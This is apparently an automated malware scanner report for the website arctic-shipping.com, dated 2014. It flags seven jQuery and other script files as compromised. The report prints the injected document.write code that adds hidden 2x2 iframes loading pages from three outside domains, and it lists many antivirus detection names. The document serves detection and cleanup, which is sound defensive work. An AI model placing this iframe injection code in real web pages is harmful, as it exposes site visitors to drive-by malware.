New scan:

Malware Scanner report for arctic-shipping.com

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "arctic-shipping.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/24/24
24 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=arctic-shipping.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://arctic-shipping.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://arctic-shipping.com/
200 OK
Content-Length: 13542
Content-Type: text/html
clean
http://arctic-shipping.com/publish_skins/CHNL/javascript.js
200 OK
Content-Length: 1773
Content-Type: application/javascript
clean
http://arctic-shipping.com/jquery-1.3.2.min.js
200 OK
Content-Length: 57741
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 56631 bytes are skipped ...
0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AML [Trj]
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.Iframe.BZW
Emsisoft
Trojan.Iframe.BZW (B)
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
Fortinet
JS/Iframe.HH!tr
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
Commtouch
IFrame.gen
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

http://arctic-shipping.com/js/jquery.galleryview-1.1.js
200 OK
Content-Length: 18825
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 16378 bytes are skipped ...
ay_font_size: '1em',
transition_speed: 400,
transition_interval: 6000,
overlay_opacity: 0.6,
overlay_color: 'black',
background_color: 'black',
overlay_text_color: 'white',
caption_text_color: 'white',
border: '1px solid black',
nav_theme: 'light',
easing: 'swing',
filmstrip_position: 'bottom',
overlay_position: 'bottom',
show_captions: false,
fade_panels: true,
pause_on_hover: false
};
})(jQuery);

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

http://arctic-shipping.com/js/jquery.timers-1.1.2.js
200 OK
Content-Length: 3876
Content-Type: application/javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

http://arctic-shipping.com/js/jquery.easing.1.3.js
200 OK
Content-Length: 8584
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 4663 bytes are skipped ...
r/> } else if (t < (2/2.75)) {
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

http://arctic-shipping.com/js/swfobject.js
200 OK
Content-Length: 7407
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 6383 bytes are skipped ...
ad=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

http://arctic-shipping.com/js/AC_RunActiveContent.js
200 OK
Content-Length: 3719
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 3209 bytes are skipped ...
space":
case "hspace":
case "class":
case "title":
case "accesskey":
case "name":
case "id":
case "tabindex":
ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1];
break;
default:
ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
}
}
ret.objAttrs["classid"] = classid;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

http://arctic-shipping.com/thickbox.js
200 OK
Content-Length: 12351
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 11379 bytes are skipped ...
r/> var w = window.innerWidth || self.innerWidth || (de&&de.clientWidth) || document.body.clientWidth;
var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight;
arrayPageSize = [w,h];
return arrayPageSize;
}
function tb_detectMacXFF() {
var userAgent = navigator.userAgent.toLowerCase();
if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) {
return true;
}
}

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

http://arctic-shipping.com/js/jquery.jcarusel.js
200 OK
Content-Length: 2870
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h
... 1975 bytes are skipped ...
unction(){if(o.afterEnd)o.afterEnd.call(this,vis());b=false});if(!o.circular){$(o.btnPrev+","+o.btnNext).removeClass("disabled");$((curr-o.scroll<0&&o.btnPrev)||(curr+o.scroll>itemLength-v&&o.btnNext)||[]).addClass("disabled")}}return false}})};function css(a,b){return parseInt($.css(a[0],b))||0};function width(a){return a[0].offsetWidth+css(a,'marginLeft')+css(a,'marginRight')};function height(a){return a[0].offsetHeight+css(a,'marginTop')+css(a,'marginBottom')}})(jQuery);

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://ajacofurniture.com/eaod.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=3203185

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185>

Hidden iFrame found.
size: 2x2     
src: http://redboneskingston.com/haod.html?j=1476365

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365>

http://arctic-shipping.com/js/nivoslider/jquery.nivo.slider.pack.js
200 OK
Content-Length: 6550
Content-Type: application/javascript
clean
http://millerusa.net/806507.js
521 Origin Down
Content-Length: 5914
Content-Type: text/html
clean
http://millerusa.net//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js/
521 Origin Down
Content-Length: 6575
Content-Type: text/html
clean
http://millerusa.net/cdn-cgi/scripts/cf.common.js
200 OK
Content-Length: 4930
Content-Type: application/javascript
clean
http://millerusa.net/test404page.js
521 Origin Down
Content-Length: 5914
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: arctic-shipping.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 23:03:50 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=24149fc685ea44a84f0f251d013b4894; path=/
X-Powered-By: PHP/5.2.6-1+lenny13
Second query (visit from search engine):
GET / HTTP/1.1
Host: arctic-shipping.com
Referer: http://www.google.com/search?q=arctic-shipping.com

Result:
The result is similar to the first query. There are no suspicious redirects found.